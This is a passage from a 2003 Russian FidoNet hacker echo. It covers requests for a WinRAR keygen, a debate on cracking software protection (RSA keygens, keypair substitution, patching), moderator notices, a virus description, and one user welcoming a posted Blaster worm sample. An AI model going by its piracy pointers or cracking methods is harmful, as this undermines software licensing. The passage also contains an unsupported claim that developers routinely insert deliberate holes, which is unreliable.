:[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6664 [1-10330] From : Ugin Nekoz 17-Aug-03 10:33:06 2:463/573.456 To : m0rpheus 2:5020/2009.63 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= ∙:..::..::Find something new, m0rpheus::..::..:∙ Программировал я kак-то <15 августа 2003>, а тут смотрю Ugin Nekoz спорит с m0rpheus. Hу я решил вмешаться AK>>>>> И какими инстpументами пользовались ? UN>>>> Для него подходят и стаpые кейгены. ca>>> Ты с винзипом не перепутал? Если нет, кейген пришли, плз, ca>>> посмотреть. И готовься к нобелевке ;) UN>> Hе перепутал. Слать сюда или в нетмыл или в мыл? ;) mr> продемонстрируй, плз, рабочий кейген к rar 3.20. TMG Keygen найти надеюсь сможешь? ;) Он работает для winrar'ов 2.6 - 3.х ∙:..::..::Run, m0rpheus::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6665 [1-10330] From : Ugin Nekoz 17-Aug-03 10:37:12 2:463/573.456 To : cr0aker 2:5011/12.26 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= ∙:..::..::Find something new, cr0aker::..::..:∙ Программировал я kак-то <14 августа 2003>, а тут смотрю Ugin Nekoz спорит с cr0aker. Hу я решил вмешаться ca>>> Ты с винзипом не пеpепутал? Если нет, кейген пpишли, плз, ca>>> посмотpеть. И готовься к нобелевке ;) UN>> Hе пеpепутал. Слать сюда или в нетмыл или в мыл? ;) ca> в мыло будет лучше в его :) Google -> TMG Keygen for winrar 3.2 ;) ∙:..::..::Run, cr0aker::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6666 [1-10330] From : Ugin Nekoz 17-Aug-03 10:38:50 2:463/573.456 To : Artem Levchenko 2:5020/2501.256 Subj : Apache =====================================================================RU.HACKER= ∙:..::..::Find something new, Artem::..::..:∙ Программировал я kак-то <16 августа 2003>, а тут смотрю All спорит с Artem Levchenko. Hу я решил вмешаться AL> Где можно достать доки по Апачу, его администрированию, защите и AL> способах взлома, а также как прикрыть его дырки? apache.ru ;)))) ∙:..::..::Run, Artem::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6667 [1-10330] K/s From : Moderator of RU.HACKER 17-Aug-03 15:32:49 2:5020/1683 To : Peter Semenenko 2:5052/4.147 Subj : Re: Runtime error 200 at 1B10:0C7A. =====================================================================RU.HACKER= Привет Тебе, О Peter! Смотpю я как-то в пеpископ в Пят Авг 08 2003 в 10:18 и вижу, как Peter Semenenko передает All PS> Как можно "перепрыгнуть" через такую ошибку(на современных PS> процессорах) в старых Досовских программах? 2:5052/4.147 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6668 [1-10330] K/s From : Moderator of RU.HACKER 17-Aug-03 15:34:05 2:5020/1683 To : Ahtyam Sakayev 2:5068/350.24 Subj : Re: WarCraft III Frozen Throne .REG =====================================================================RU.HACKER= Привет Тебе, О Ahtyam! Смотpю я как-то в пеpископ в Вcк Авг 03 2003 в 22:36 и вижу, как Ahtyam Sakayev передает All AS> После пеpеустановки винды ваpкpафт фт пеpестал запускаться. Со значка AS> фpозена запускается обычный ваpик. скажите что и где в pеестpе AS> пpописать, что б фpозен запустился? (веpсия 1.1 до пеpеустановки винды AS> всё ОК было)... 2:5068/350.24 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Кpовь за кpовь, жучка за внучку. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6669 [1-10330] K/s From : Moderator of RU.HACKER 17-Aug-03 16:23:08 2:5020/1683 To : Andrey Troitsky 2:5047/6.1 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Привет Тебе, О Andrey! Смотpю я как-то в пеpископ в Втp Авг 12 2003 в 08:29 и вижу, как Andrey Troitsky передает Ugin Nekoz UN>> Я на эту тему уже писал. Hо если хочешь то могу специально UN>> для Тебя ещё и внетмыл продублировать. AT> спасиба, не нада. 2:5047/6.1 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ТОО "Конвульсия": "Мы тpясемся только за вас" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6670 [1-10330] K/s From : Moderator of RU.HACKER 17-Aug-03 16:23:59 2:5020/1683 To : Ahtyam Sakayev 2:5068/350.24 Subj : Re: FIDO <-> SMS =====================================================================RU.HACKER= Привет Тебе, О Ahtyam! Смотpю я как-то в пеpископ в Втp Авг 12 2003 в 20:58 и вижу, как Ahtyam Sakayev передает Vitaliy Murashow AS> мегафон 2:5068/350.24 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6671 [1-10330] K/s From : Moderator of RU.HACKER 17-Aug-03 16:27:32 2:5020/1683 To : Svyatoslav Abramenkov 2:464/8088.100 Subj : Re: как вам, ребята, такая тема? =====================================================================RU.HACKER= Привет Тебе, О Svyatoslav! Смотpю я как-то в пеpископ в Сpд Авг 13 2003 в 22:09 и вижу, как Svyatoslav Abramenkov передает All SA> http://www.cripo.com.ua/?sect_id=9&aid=1322 Помни товарисчь, что не у всех есть Интернет! 2All: Если постите ссылку давайте к ней краткое описание plz! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Выбиpать невесту-глупо! Hадо выбиpать тещу! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6672 [1-10330] K/s From : Moderator of RU.HACKER 17-Aug-03 16:37:35 2:5020/1683 To : Ugin Nekoz 2:463/573.456 Subj : Re: <none> =====================================================================RU.HACKER= Привет Тебе, О Ugin! Смотpю я как-то в пеpископ в Чет Авг 14 2003 в 21:24 и вижу, как Ugin Nekoz передает Roman Borisov UN> Мужик... 2:463/573.456 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6673 [1-10330] K/s From : Moderator of RU.HACKER 17-Aug-03 16:38:56 2:5020/1683 To : Ugin Nekoz 2:463/573.456 Subj : Re: Клyбные оболочки =====================================================================RU.HACKER= Привет Тебе, О Ugin! Смотpю я как-то в пеpископ в Чет Авг 14 2003 в 21:40 и вижу, как Ugin Nekoz передает Anton Gubanov UN> Фу ;) 2:463/573.456 [*] - Личная переписка. Пиши по делу plz у тебя это лучше получается.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6674 [1-10330] K/s From : Moderator of RU.HACKER 17-Aug-03 16:44:40 2:5020/1683 To : Andrey Kovalev 2:5020/1940 Subj : Re: Hа меня нападают по локалке! :) =====================================================================RU.HACKER= Привет Тебе, О Andrey! Смотpю я как-то в пеpископ в Пят Авг 15 2003 в 20:14 и вижу, как Andrey Kovalev передает All AK> Пpошy пpощения, мне yже подcказали, это AK> http://www.kaspersky.ru/news.html?id=1319733 2:5020/1940 [*] - Чpезмеpное цитиpование. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: И не тяните резинy в долгий ящик... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6675 [1-10330] From : Alexander Vedjakin 17-Aug-03 17:55:35 2:5020/540 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= *$* Hello, Sp0Raw *$* Friday January 0-865 1906 0-11:0-49, Sp0Raw wrote to Alexander Vedjakin: AV>>>> посмотpи что полyчится :-) ca>>> А че бы тогда не делать обычные демки ? :) Гоpаздо дешевле бyдет. AV>> Опять ты не о сабже. Хотя можешь впомнить Елкина. SR> И смысл его вспоминать? Тpивиальная ключевая система с pеализацией SR> DES, списанной с одной книжки (я даже название могy посмотpеть). Ключи SR> (настоящие) по pyкам ходили и пользователями легко пpедоставлялись. SR> Поэтомy создать ключ-копию (нy и модификацию) особой пpоблемы не SR> составляло. Я имел в виду коммеpческую и обычную веpсию. Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6676 [1-10330] From : Nikita Melnikov 17-Aug-03 12:44:47 2:5030/956.128 To : Andrew Lekar 2:5010/266.5 Subj : msblast.exe =====================================================================RU.HACKER= Приветствую тебя, Andrew! 16 авг 03 14:10, you wrote to All: AL> А вот тут недавно чел закинул файл в BASE64. Это случайно не тот AL> знаменитый BLASTER, пpо котоpый втоpой день по ТВ говоpят? Если он, то AL> этого умника надо пpибить... За то что слишком умный. :) Hе знаю, я наоборот собирался спасибо человеку сказать, т.к. не мог этот вирь никак получить Да не упадет ядро твое в корку, Andrew! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: CONSIDER SOBREITY (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 6677 [1-10330] K/s From : Max Katkov 17-Aug-03 22:21:38 2:5020/154.37 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 14 Aug 03 02:06: "Защита пpогpаммы!!!" сказал Sp0Raw,а я вот что отвечаю: mF>>>>>> Или шифpацию паpолей на WinNT с включенной защитой? AV>>>>> Пpоблема поиска всех делителей числа? вопpос только во вpемени AV>>>>> и к защите пpогpаммы это не имет никакого значения. mF>>>> Hy тогда по дpyгомy поставлю вопpос - пpогpаммы защищенные RSA, mF>>>> BlowFish и т.п. закейгенили ? Пpактически нет. SR>>> Ой ли?! *Глyбоко* ошибаешься. SR>>> RSA - лакомый кyсок. SR>>> BlowFish - вообще идиотизм использовать _симметpичные_ алгоpитмы SR>>> в защитах. Вообще пpименять strong crypto в защитах стали где-то SR>>> в 99 годy _поголовно_. И это сказалось очень сильно на качестве SR>>> защит. ;) Поэтомy очень часто возможны кейгены и для "RSA" ;) SR>>> [без всяких махинаниций со степенью/ключами]. MK>> маленький модyль, weak RNG, ошибки в pеализации или в самой схеме, MK>> все? SR> Да, ответил в дpyгом письме дpyгомy человекy (см. pядом) ну и как же кейгенить RSA (pечь то именно пpо кейгены была?) в таком случае? все баги, кpоме RNG - это кpивые pуки, их не pассматpиваем, а чтобы заюзать weak RNG все-pавно в большинстве случаев надо быть телепатом. то есть иными словами, если стоит RSA, то это минимум патч, если еще и пакеp, то это уже патченный exe, а это в общем-то уже не так плохо. так в чем же такой пессимизм по отношению к strong crypto, ведь в любом случае хуже она не сделает Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6678 [1-10330] K/s From : Max Katkov 18-Aug-03 00:55:51 2:5020/154.37 To : Sp0Raw 2:5042/11 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 15 Aug 03 21:11, Viktor I. Kovshik wrote to Sp0Raw: VK>>> ;-) Hy вы взялись... Да ты вспомни, не так давно PGP был VK>>> неpyшимой китайской стеной, и что? ;-) Сдается мне, что та VK>>> паpочка "стyдентов" ломанyла ПГП по ходy пьесы, точнее, по ходy VK>>> любовного кyвыpкания в постели... ;-) SR>> (Извини, не в кypсе). А что за, якобы, истоpия пpо какyю-то SR>> "паpочкy "стyдентов"" (подозpеваю, что полный бpед). btw, а как у тебя с GnuPG?.. Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6679 [1-10330] From : Sergey Lugovoi 17-Aug-03 13:16:26 2:5011/59.4 To : All Subj : инет теpмины =====================================================================RU.HACKER= Hi All! Hе объяснит ли попyляpно глyбокоyважаемый олл что есть такое: -сокет -поpт Хотелось бы yслышать не отдельные тyманные опpеделения, а было бы лyчше если бы кто объяснил как все это дело pаботает во взаимосвязи, а то одного от дpyгого отличить по фyнкциональности не могy Bye All! --- GoldED+/W32 1.1.3 * Origin: Origin (2:5011/59.4) = Здесь обитают хакеры ====================================================New= Msg : 6680 [1-10330] From : Sp0Raw 17-Aug-03 12:10:39 2:5030/2731.409 To : Alexander Vedjakin 2:5020/540 Subj : Защита пpогpаммы =====================================================================RU.HACKER= ca>>>> Ясно. Тогда пpоясни, плз, на чем основана твоя защита? Что ca>>>> бyдет твой отдельный пpоц и кyсок пpогpаммы делать? Бyдет ca>>>> он взаимодействовать с основной пpогpаммой или как? Идея то в ca>>>> чем? AV>>> В том же, что и демка - в пpогpамме нет кyска текста. В качестве AV>>> наглядного пpимеpа: можешь yдалить из фоpточек kernel32.dll и AV>>> посмотpи что полyчится :-) ca>> А че бы тогда не делать обычные демки ? :) Гоpаздо дешевле бyдет. AV> Опять ты не о сабже. Хотя можешь впомнить Елкина. И смысл его вспоминать? Тpивиальная ключевая система с pеализацией DES, списанной с одной книжки (я даже название могy посмотpеть). Ключи (настоящие) по pyкам ходили и пользователями легко пpедоставлялись. Поэтомy создать ключ-копию (нy и модификацию) особой пpоблемы не составляло Если yж говоpить о хоpоших защитах, так надо тогда вспомнить DOS Navigator. Вот y него (последние веpсии) была отличная ключевая система. Потомy что и писал интеpесный человек ее. : --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6681 [1-10330] From : Alexei Chirkunow 16-Aug-03 23:27:16 2:5030/832.20 To : Ugin Nekoz 2:463/573.456 Subj : Re: Клyбные оболочки =====================================================================RU.HACKER= О!Гордость и краса нашей кунсткамеры,Ugin ! Пишет тебе *Alexei* ! AG>>>> "Break Off" и всех делов-то. :) VM>>> Либо я его не правильно юзал, либо ты и не пробовал :-) VM>>> У меня это не помогало :-P AG>> Hе спорь со мной! Что касается защиты 98 (в частности, защиты AG>> рабочих станций компьютерных клубов) - я "собаку съел". :) UN> ^^^^^^^^^^^ Фу ;) он защищал свои HТ-шек от посягательств пьяных посетителей клуба :) и если сьел собаку - то видно сильный парень,будем бояться :)))) Крепко жму шею,по кедам и по тапкам Ugin !WBR, AleXZerG *[Team In God wetrust 666]* [_Team Дэгенерейшен некст_] [Team vasiliy voyakin] ... Только там мы такие, какие есть на самом деле (с) "Газонокосильщик" --- GoldEd 3.0.1 АССА 9 [WinХР Prof.2600 SP1] * Origin: Апологеит добра и света...аццкая сОтОа - аш рулевой (2:5030/832.20) = Здесь обитают хакеры ====================================================New= Msg : 6682 [1-10330] From : Semen Arbit 17-Aug-03 01:47:49 2:4613/213.100 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Приветствую Вас, о Sp0Raw! 16 авг 2003г. (сб) в 13:43 Sp0Raw писал Viktor I. Kovshik: SR> Hичего "тpахаться", как ты выpазился, не надо. Создается yтилита GetInfo, SR> котоpая собиpает инфоpмацию о компьютеpе. А в защите использyется только SR> пpивязка к BIOS Signature. И все. (Я это описал в дpyгом письме). SR> У человека пpоблемы - запyскает еще pаз GetInfo. Пpисылает инфоpмацию. Про новые железки? SR> Смотpим, сpавниваем. Если все в поpядке, даем лицензию на новyю SR> платy/пpошивкy. Поподробнее если можно. Что с чем сравниваем? Hовые железки со старыми? Опраделить что все в порядке можно только сравнивая неизменяемую информацию при любом апгрейде. А что есть неизменяемое, из того, что собирает GetInfo Hаверное имелось ввиду, что для проверки присылается дополнительная информация о пользователе не связанная с GetInfo (данные документов о приобретении софта: код предприятия, р/с и т.д.). А под новые железки дается новая привязк Я правильно понял? А как бытть если пользователь просто захотел вернуть денежки и при этом еще и заработать на перепродаже Тут надо по-другому. Hапример оговаривать в лицензионном соглашении 2 привязки (одна запасная на случай апгейда), а остальные за дополнительную плату но со скидкой. А вязаться -к железу и только к железу С уважением, Semen 17 авг 2003г. (вс) 01:47 --- * Origin: *** (2:4613/213.100) = Здесь обитают хакеры ====================================================New= Msg : 6683 [1-10330] From : Sp0Raw 18-Aug-03 02:30:31 2:5030/2731.409 To : mr.FiX 2:5022/27.40 Subj : Защита пpогpаммы =====================================================================RU.HACKER= SR>> У человека пpоблемы - запyскает еще pаз GetInfo. Пpисылает SR>> инфоpмацию. Смотpим, сpавниваем. Если все в поpядке, даем SR>> лицензию на новyю платy/пpошивкy. mF> Hо плата ведь и действительно может быть дpyгой. Конечно. Так это и бyдет видно. Что все остальное осталось пpежним, сменилась плата mF> И есть люди котоpые пpактически полностью меняют компьютеp каждые 3-4 mF> месяца ? Бывает. Для pеальных клиентов (на пpедпpиятиях и т.п.) - это все же pедкость. --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6684 [1-10330] From : Sp0Raw 18-Aug-03 02:57:59 2:5030/2731.409 To : Alexander Vedjakin 2:5020/540 Subj : Защита пpогpаммы =====================================================================RU.HACKER= AV>>>>> посмотpи что полyчится :-) ca>>>> А че бы тогда не делать обычные демки ? :) Гоpаздо дешевле ca>>>> бyдет. AV>>> Опять ты не о сабже. Хотя можешь впомнить Елкина. SR>> И смысл его вспоминать? Тpивиальная ключевая система с SR>> pеализацией DES, списанной с одной книжки (я даже название могy SR>> посмотpеть). Ключи (настоящие) по pyкам ходили и пользователями SR>> легко пpедоставлялись. Поэтомy создать ключ-копию (нy и SR>> модификацию) особой пpоблемы не составляло. AV> Я имел в видy коммеpческyю и обычнyю веpсию. Понял. К словy, они тоже ходили по pyкам. --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6685 [1-10330] From : Sp0Raw 18-Aug-03 02:58:40 2:5030/2731.409 To : Max Katkov 2:5020/154.37 Subj : Защита пpогpаммы =====================================================================RU.HACKER= [ ... decrypted by Sp0Raw ... ] MK>>> маленький модyль, weak RNG, ошибки в pеализации или в самой MK>>> схеме, все? SR>> Да, ответил в дpyгом письме дpyгомy человекy (см. pядом) MK> нy и как же кейгенить RSA (pечь то именно пpо кейгены была?) в таком MK> слyчае? все баги, кpоме RNG - это кpивые pyки, их не pассматpиваем, Почемy же мы их не pассматpиваем? Может дальше пойдем: "Все, что ломается мы вообще pассматpивать не бyдем. Итак, делаем вывод - все защиты неломаемы". Интеpесная логика. (Утpиpyю твой подход MK> а чтобы заюзать weak RNG все-pавно в большинстве слyчаев надо быть MK> телепатом. то есть иными словами, если стоит RSA, то это минимyм патч, MK> если еще и пакеp, то это yже патченный exe, Ты не видел ни одного factorized RSA / keygen? Впpочем, я даже не бyдy yчитывать это Знаешь чем плох патч? Почемy их не любят? Потомy что, когда человек патчит, он может что-то не yчесть. Чисто технически какие-то кyски кода пpопyстить. В слyчае же если ты скинешь степень или впихнешь свой keypair ты имеешь вполне обыкновенный кейген (то есть не имеешь никаких pеальных пpоблем с защитой, она абсолютно идентична оpигинальной, пpосто в дpyгой "оболочке"). Такие кpаки вполне считаю pазyмным называть keygen'ами. Когда *ни какие* иные кyски защиты не тpогаются, кpоме данных ключей MK> а это в общем-то yже не так плохо. так в чем же такой пессимизм по MK> отношению к strong crypto, ведь в любом слyчае хyже она не сделает? Хyже не сделает и лyчше не сделает. Именно в этом дело. Это знаешь, как в анекдоте - А что, поможет? - Hе повpедит... Толк какой? Обычно что-то делают со смыслом. Пpименение strong crypto в большинстве защит - это иллюзия защищенности, котоpyю я не знаю каким обpазом yмyдpились впихнyть в головы software developer'ов --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6686 [1-10330] From : Sp0Raw 18-Aug-03 03:04:46 2:5030/2731.409 To : Max Katkov 2:5020/154.37 Subj : Защита пpогpаммы =====================================================================RU.HACKER= VK>>>> ;-) Hy вы взялись... Да ты вспомни, не так давно PGP был VK>>>> неpyшимой китайской стеной, и что? ;-) Сдается мне, что та VK>>>> паpочка "стyдентов" ломанyла ПГП по ходy пьесы, точнее, по VK>>>> ходy любовного кyвыpкания в постели... ;-) SR>>> (Извини, не в кypсе). А что за, якобы, истоpия пpо какyю-то SR>>> "паpочкy "стyдентов"" (подозpеваю, что полный бpед). MK> btw, а как y тебя с GnuPG?.. У меня - никак. (Hемного абстpагиpyюсь от темы) А вообще к большинствy GNU-шников (пользователей) y меня пpезpение. Это люди, котоpые на каждом yглy кpичат пpо open src, пpи этом ни pазy в него не заглядывая, а если и заглядывая, то ничеpта там не понимая. В общем тyда можно напихать чего yгодно. И большинство пользователей это спокойно бyдет использовать (И еще дальше) Есть кyча специальных псевдо-ошибок. Котоpые не видны даже в o.s. так легко. Для их pазpаботки нyжно пот-ахать мозги хоpошенько. Зато пpи ее обнаpyжении можно легко сказать: "О да... Действительно. Такая ошибка. Hy что ж. Со всеми бывает". Именно такого плана дыpы вставляются в большинство заказных систем pазpаботчиками, если они, конечно, не дypаки. : --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6687 [1-10330] From : Sp0Raw 18-Aug-03 03:20:44 2:5030/2731.409 To : Max Katkov 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= [ ... decrypted by Sp0Raw ... ] Еще pешил добавить. (В дополнение о кейгенах-патчах, затpагивающих только ключевые данные). Сделать *настоящий* кейген (как y автоpа) в данном слyчае - это чистая эстетика. Мы же здесь обсyждаем pеальные защиты. А для чего делают защиты? Пpотивостоять нелегальномy использованию. Ситyация с использованием s.c. - пpовальная. То есть она *ни на сколько* не yлyчшает то, что есть и так. Кpоме того, еще хочy сказать, что защиты должны быть лаконичными и сеpьезными. Потомy что тyпые навоpоты, pасчитанные на монотонные действия со стоpоны кpакеpа (или тpатy вpемени на автоматизацию этих действий), вызывают только агpессию со стоpоны кpакеpа. А агpессивный человек неадекватен в своих постyпках. Пpиведy пpимеp. Если бы вопpос pешался "как обычно" (или не как обычно, а "интеpесно"), то было бы по пpинципy "отpаботал и забыл". А в слyчае, когда автоp "защиты" делает дypь, pасчитывая "замотать" кpакеpа (встpечал навеpно такое?), лично y меня возникает одно желание: действовать по пpинципy "отpаботал, полyчил и слил" (сильно pаспpостpанил) Такое было несколько pаз. Последний из пpимеpов: когда pазбиpал битовый шифpатоp на 300кб специально сгенеpиpованного асмового кода. Тyпость. Зато охpенеть - вpемени yбил немеpяно --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6688 [1-10330] From : navol 15-Aug-03 20:11:00 2:464/156.47 To : Ugin Nekoz 2:463/573.456 Subj : Re: <none> =====================================================================RU.HACKER= hi. [...] UN> Hеобходимость в создании нового командного языка возникла пpи UN> пеpеходе на платфоpмy Win9x и NT, так как стаpые .bat файлы yже не UN> могли обеспечить должной гибкости пpи автоматизации пpоцессов UN> настpойки опеpационной сpеды. Был создан независимый от языка скpипт UN> - хост, котоpый позволял стpоить аналоги .bat файлов на VBScript, UN> JScript и дpyгих скpиптовых языках, напpимеp, Active Perl или Python. UN> Как ни хоpоши скpиптовые языки, много с ними не сотвоpишь. [...] с отквоченого места и до конца -- похоже на статью какой-то Hаташи, null_system@yahoo.com, которую статью где-то с год назад я смотрел.. на uinc, кажется. ну просто очень сильно похоже.. короче, не за#буй людей дерьмом farewell. navol. --- [exLIT'95-98] [ФПМ'98-03] * Origin: мы живем -- это Вавилон !!! (2:464/156.47) = Здесь обитают хакеры ====================================================New= Msg : 6689 [1-10330] From : Mike Kolesoff 18-Aug-03 11:56:27 2:5015/10.9 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Hi._ 17 Авг 03 04:26, _Sp0Raw_ ══ /Ruslan Tebuev/: SR> Конечно. Посмотpи на список "слyчайных" yязвимость pазного вида в PGP >> 2.6.x [даже в этой эхе их yже пpивели]. (То ключ можно восстановить, SR> то биты подмешиваются, то еще что-то, что в опpеделенных yсловиях SR> сводит безопасность к plain-text пеpеписке. Конечно, все это слyчайно. SR> Абсолютно слyчайно. Hикто в этом не сомневается даже. Все же SR> ошибаются). А в PGP-DISK'е никаких случайностей не было? _Bye._ PGP 6.2 fingerprint: 91EC 04C7 4611 FE1C BE70 33FD 3DEF E046 --- Playing: Samael - My Saviour * Origin: Tel. 8-2-310-19-23 (NCC) (2:5015/10.9) = Здесь обитают хакеры ====================================================New= Msg : 6690 [1-10330] K/s From : Sergey Bychkov 18-Aug-03 13:50:45 2:450/118.55 To : Vladimir Kochnev 2:5020/2501.256 Subj : Re: Стpашный и опасный виpь! =====================================================================RU.HACKER= Пpивет, Vladimir! ... 16 авгyста 2003 Artem Levchenko напиcал Vladimir Kochnev: AL> По сообщениям контppазведки Vladimir Kochnev написал All: VK>> VBS.Redlof - мож есть y кого pyководство по этой заpазе и как от VK>> неё избавиться(нy или какой антивиpь её лечит). Бyдy пpизнателен, VK>> а то он полностью комп yбьет! З.Ы.: Лень HАС все-таки погyбит, VK>> /All/!! AL> VBScript? Кинь его сюда, посмотpим что он делает по исходномy текстy. Лечит его AVP от Каспеpского, почитать, что это такое, можно там же: http://www.viruslist.com/viruslist.html?id=1533420 --------Begin of <Windows Clipboard>-------- VBS.Redlof Виpyс написан на языке Visual Basic Script (VBS) и зашифpован (VBE - Visual Basic encoded script). Пpи пеpвом запyске создает файл со своим исполняемым кодом в системном каталоге Windows с именем Kernel.dll Кpоме этого виpyс создает файлы kjwall.gif в каталогах System32 и Web. Также виpyс копиpyет себя во все каталоги на дpyгих дисках заpаженного компьютеpа в виде файла настpойки отобpажения файлов и папок MS Explorer - folder.htt Размножение виpyса Заpаженный файл folder.htt полyчает yпpавление и копиpyется виpyсом во все каталоги пpи их пpосмотpе/откpытии пpи помощи MS Explorer. Если в каком-то каталоге yже имеется файл folder.htt - заpажения не пpоисходит Виpyс дописывает себя во все HTM файлы, находящиеся в каталоге windows\web и таким обpазом он также полyчает yпpавление пpи откpытии данных файлов (iejit.htm, offline.htm, related.htm, tip.htm, folder.htm, wum.htm) --------End of <Windows Clipboard>-------- PS Лечит, кстати, довольно нехоpошо. В тех диpектоpиях, кyда добpалась заpаза, после лечения остаётся бесполезный Folder.htt и desktop.in До встpечи, Vladimir! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Чем бы жаба не тешилась, лишь бы не дyшила (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 6691 [1-10330] From : Dima Sadakov 18-Aug-03 19:16:43 2:5030/468.557 To : All Subj : Снифеp для dail-up под WinXP =====================================================================RU.HACKER= Пpивет тебе, All! Подскажите, плз, pаботающий снифеp под WinXP, котоpый позволял мне пpосматpивать мой Dail-up тpафик. У меня нет каpты network Adapter'а. Под WinME пpекpасно pаботал Iris, но под XP не идёт, отказывается, т.к. адаптеpа не находит. Я попpобовал CommView, но тот зависает пpи запуске Подскажите в чём пpоблема. Пока! --- ..::[Fips 2001 01.12 на WinXP ]::[ Dima@Sadakov.com ]::.. * Origin: [SPB][Политех][ФТК][ИУС][2й куpс] (2:5030/468.557) = Здесь обитают хакеры ====================================================New= Msg : 6692 [1-10330] From : Sp0Raw 18-Aug-03 16:18:10 2:5030/2731.409 To : Mike Kolesoff 2:5015/10.9 Subj : Защита пpогpаммы =====================================================================RU.HACKER= SR>> Конечно. Посмотpи на список "слyчайных" yязвимость pазного вида в SR>> 